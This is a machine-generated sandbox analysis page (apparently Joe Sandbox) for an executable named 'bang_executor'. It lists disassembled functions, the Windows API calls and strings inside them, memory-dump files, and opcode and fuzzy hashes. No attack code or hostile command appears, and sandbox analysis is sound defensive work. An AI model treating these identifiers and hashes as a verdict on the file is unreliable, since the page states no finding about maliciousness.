                                        • _wcslen.LIBCMT ref: 004EBDB6
                                        • _wcslen.LIBCMT ref: 004EBE4C
                                        • _wcslen.LIBCMT ref: 004EBEB1
                                          • Part of subcall function 004EC37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 004EC3A5
                                          • Part of subcall function 004EBBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 004EBC1C
                                          • Part of subcall function 004EBBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 004EBC48
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$DirectoryRemove$CloseFind
                                        • String ID:
                                        • API String ID: 973666142-0
                                        • Opcode ID: 2b156689e3ea54ac556007fc1594c0ba8ea6006c3ce1fc61aa71a71ac402cba5
                                        • Instruction ID: 31d6edaf7e4de64cea8ec3c338980b2ca0798a7a785a3dcd676514c6460f217d
                                        • Opcode Fuzzy Hash: 2b156689e3ea54ac556007fc1594c0ba8ea6006c3ce1fc61aa71a71ac402cba5
                                        • Instruction Fuzzy Hash: A941D9725043D096CB30AB6A88459FFB3E9EF84301F50481FEA8993241DB7C9D89C7DA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E849E Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 112COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,00000800,?,?,08ADEBCE,00000000,?,00000000), ref: 004E8596
                                          • Part of subcall function 004E8C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 004E8CB2
                                          • Part of subcall function 004E8C95: OpenProcessToken.ADVAPI32(00000000), ref: 004E8CB9
                                          • Part of subcall function 004E8C95: GetLastError.KERNEL32 ref: 004E8CF6
                                          • Part of subcall function 004E8C95: CloseHandle.KERNEL32(?), ref: 004E8D05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLastProcess$CloseCurrentHandleOpenToken
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege$TP
                                        • API String ID: 3931873934-3055981536
                                        • Opcode ID: 86fd8f6a1e47a47bdf85adfba95298164305e0b03d584c75172f91b1abd99018
                                        • Instruction ID: 8d81589027319c9653605fd612a16e77b83fd61e33852e0cc49e58b863576f51
                                        • Opcode Fuzzy Hash: 86fd8f6a1e47a47bdf85adfba95298164305e0b03d584c75172f91b1abd99018
                                        • Instruction Fuzzy Hash: 4741C571A04288AEDF20DF56DC05BFE77A8EF59305F04005EF509A7281DB795E48CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050EFD8 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00506F64,00000000,00000000,00507F99,?,00507F99,?,00000001,00506F64,?,00000001,00507F99,00507F99), ref: 0050F025
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0050F0AE
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0050F0C0
                                        • __freea.LIBCMT ref: 0050F0C9
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: bbba30b3ab087df4ab367171da63c168d052912ecaa84d6c8872f8d592eef05c
                                        • Instruction ID: 66d1d1efb0f8f442792046edf191559d960f197837a3804e033e7edc44cc4a73
                                        • Opcode Fuzzy Hash: bbba30b3ab087df4ab367171da63c168d052912ecaa84d6c8872f8d592eef05c
                                        • Instruction Fuzzy Hash: AE31CD72A0020AABDB249F64DC59EAE7FA5FB40310F048229FC05D7192EB35CD94CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FC5F3 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 004FC5F6
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004FC605
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004FC613
                                        • ReleaseDC.USER32(00000000,00000000), ref: 004FC621
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 936f6ecc3eb4d01f1800c5b0d390416b2a9e6e326b2cc01b520d898bd15fa330
                                        • Instruction ID: 2bca0ac9efd2b7b745986bed2828c38748975d857e1dfcbec3fab59039d4200e
                                        • Opcode Fuzzy Hash: 936f6ecc3eb4d01f1800c5b0d390416b2a9e6e326b2cc01b520d898bd15fa330
                                        • Instruction Fuzzy Hash: 07E0EC3598AAA8A7D7212B61AC1DFEB3F54EF3F757F040405F60596290CBB444099FD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FD76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: }
                                        • API String ID: 176396367-4239843852
                                        • Opcode ID: 1fb708cda60c37440dad0fd192e59e0b3bda746fa77ee669cc08156879d2dce7
                                        • Instruction ID: 87a6a3e520069cf109dce8d8dc410263db27a068368f4f05d6c4e222e928f36b
                                        • Opcode Fuzzy Hash: 1fb708cda60c37440dad0fd192e59e0b3bda746fa77ee669cc08156879d2dce7
                                        • Instruction Fuzzy Hash: 7021E23290430A5AD731FF24C849A7BB7E9EF85750F40042BF640C7281EA64D84887EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005001B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(0001045C), ref: 00500210
                                        • DialogBoxParamW.USER32(GETPASSWORD1,0001045C,004FD510,?,?), ref: 00500247
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DialogParamVisibleWindow
                                        • String ID: GETPASSWORD1
                                        • API String ID: 3157717868-3292211884
                                        • Opcode ID: 701c7f4cc69fb47f4aa0df99a3b081a37238fcdc0ed26af26ceff58b496e1ee3
                                        • Instruction ID: 555fbc7e429dff31c24f354af1ecf884d7a8f934883fdf017394f074afad8f12
                                        • Opcode Fuzzy Hash: 701c7f4cc69fb47f4aa0df99a3b081a37238fcdc0ed26af26ceff58b496e1ee3
                                        • Instruction Fuzzy Hash: EA11F375648285AFD3309B64DC4ABFFBBD8BB9A704F01481EB185C21D1C6A46888DB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F136B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F12F6: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004F1315
                                          • Part of subcall function 004F12F6: GetProcAddress.KERNEL32(0052C1F0,CryptUnprotectMemory), ref: 004F1325
                                        • GetCurrentProcessId.KERNEL32(?,00000200,?,004F1366), ref: 004F13F9
                                        Strings
                                        • CryptUnprotectMemory failed, xrefs: 004F13F1
                                        • CryptProtectMemory failed, xrefs: 004F13B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        • Opcode ID: c92acaa5440c0558047fc7114a72d1967c5694a4a1aa6b75ac7ff71c9a3b5823
                                        • Instruction ID: 5ee2cdd20545d293def8cdfa7c5cbec46194e8d0fd4c024fbdbbebe9cc5d57b6
                                        • Opcode Fuzzy Hash: c92acaa5440c0558047fc7114a72d1967c5694a4a1aa6b75ac7ff71c9a3b5823
                                        • Instruction Fuzzy Hash: 2C112931600329EBEB16AB22DC0197E3F64AF61724B058127FD116B2A3D6389D4296D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004ED8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 004ED8D3
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: __vswprintf_c_l_swprintf
                                        • String ID: %c:\
                                        • API String ID: 1543624204-3142399695
                                        • Opcode ID: 605b6734637bfeb357f0e63ba9d1632591213a80b1b02928346fdf62e1e360e5
                                        • Instruction ID: 059c0330fe6c061db635fb57b3c7a9727858b8ca4408ab609738e39870d91b5f
                                        • Opcode Fuzzy Hash: 605b6734637bfeb357f0e63ba9d1632591213a80b1b02928346fdf62e1e360e5
                                        • Instruction Fuzzy Hash: BD0168A380439279DB306B779C46D7FBBACEFD5762740841BF485C21D3EA28D840C2A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005010F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0050130A
                                        • ___raise_securityfailure.LIBCMT ref: 005013F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: 8]T
                                        • API String ID: 3761405300-3056262094
                                        • Opcode ID: 8430b656caf5718a70c68ff1a27d5975b5d335927f6ce2636f3748a647daaa01
                                        • Instruction ID: eaa1e6e4d78d27787e66881ee59a6e24d219055c95b0f50862ce912033f07295
                                        • Opcode Fuzzy Hash: 8430b656caf5718a70c68ff1a27d5975b5d335927f6ce2636f3748a647daaa01
                                        • Instruction Fuzzy Hash: 2021FABD510B00DBD315CF15E8856843BA8FF6B318F5444AAE508CB3A2F3B056A9EF45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050E19E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0050B9A5: GetLastError.KERNEL32(?,005250C4,00506E12,005250C4,?,?,0050688D,?,?,005250C4), ref: 0050B9A9
                                          • Part of subcall function 0050B9A5: _free.LIBCMT ref: 0050B9DC
                                          • Part of subcall function 0050B9A5: SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA1D
                                          • Part of subcall function 0050B9A5: _abort.LIBCMT ref: 0050BA23
                                        • _abort.LIBCMT ref: 0050E1D0
                                        • _free.LIBCMT ref: 0050E204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast_abort_free
                                        • String ID: p,R
                                        • API String ID: 289325740-400878132
                                        • Opcode ID: 1a5c6d422fa88ba8c01547d5e444223eb5f226ed1db8d25424a3218761eec1df
                                        • Instruction ID: b1b6b5e42639104d217bf892905856175d5f8812c26ea08f5db231be6cf058b3
                                        • Opcode Fuzzy Hash: 1a5c6d422fa88ba8c01547d5e444223eb5f226ed1db8d25424a3218761eec1df
                                        • Instruction Fuzzy Hash: 2F018479D01A23EBCB319F58C84626DBB74BF55B20B25061AE865772C1CB706D42DFC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00501405 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00501410
                                        • ___raise_securityfailure.LIBCMT ref: 005014CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: 8]T
                                        • API String ID: 3761405300-3056262094
                                        • Opcode ID: 4bbf4d6bf0247688547a17d5bfcecd981601b8ba352384c6072934bb9a2cb1d8
                                        • Instruction ID: b6a0b9908f7413b3e330d1f18934a347326219e01becbcafe971f9cbbd76ccad
                                        • Opcode Fuzzy Hash: 4bbf4d6bf0247688547a17d5bfcecd981601b8ba352384c6072934bb9a2cb1d8
                                        • Instruction Fuzzy Hash: 9311D7BD510A04DBC711DF16E8856C43BB9BF2B308B4050AAE9088B372F3B05769EF45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F05C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(004E7BEB,?,004E1436,004E7BEB), ref: 004F05F8
                                        • LoadStringW.USER32(004E7BEB,?,004E1436), ref: 004F060F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: LoadString
                                        • String ID: pPR
                                        • API String ID: 2948472770-2490293454
                                        • Opcode ID: 8fe422600fa78e498ce755fddbfeeb629596e5fc74c2101eadbc417821a9fa4b
                                        • Instruction ID: 4169e384529047c30a5eac8be69632a339e439b6868240c53e5a1aa661751aa7
                                        • Opcode Fuzzy Hash: 8fe422600fa78e498ce755fddbfeeb629596e5fc74c2101eadbc417821a9fa4b
                                        • Instruction Fuzzy Hash: E7F0F835100218BBDF111F52EC08CFB7F69FF5A394B004425FE0886132E3328864EBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F30CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,004F31E7,?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30D0
                                        • GetLastError.KERNEL32(?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30DC
                                          • Part of subcall function 004E7BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E7BD5
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004F30E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 1091760877-2248577382
                                        • Opcode ID: fc672ba2d84ab9ee69686388fa97c34b6a65b6440e7a6089810d81dbd9c6f47c
                                        • Instruction ID: 0ee1dc4e6a6601e34fa8dcb79eb282ebf3ea2c789429225d26e09990eb876283
                                        • Opcode Fuzzy Hash: fc672ba2d84ab9ee69686388fa97c34b6a65b6440e7a6089810d81dbd9c6f47c
                                        • Instruction Fuzzy Hash: 41D02E3240C0343BD6003329AC0ECAF3D09AF2233BF208309F239652E0DA244E8182D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F01FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,004EF951,?), ref: 004F01FF
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,004EF951,?), ref: 004F020D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
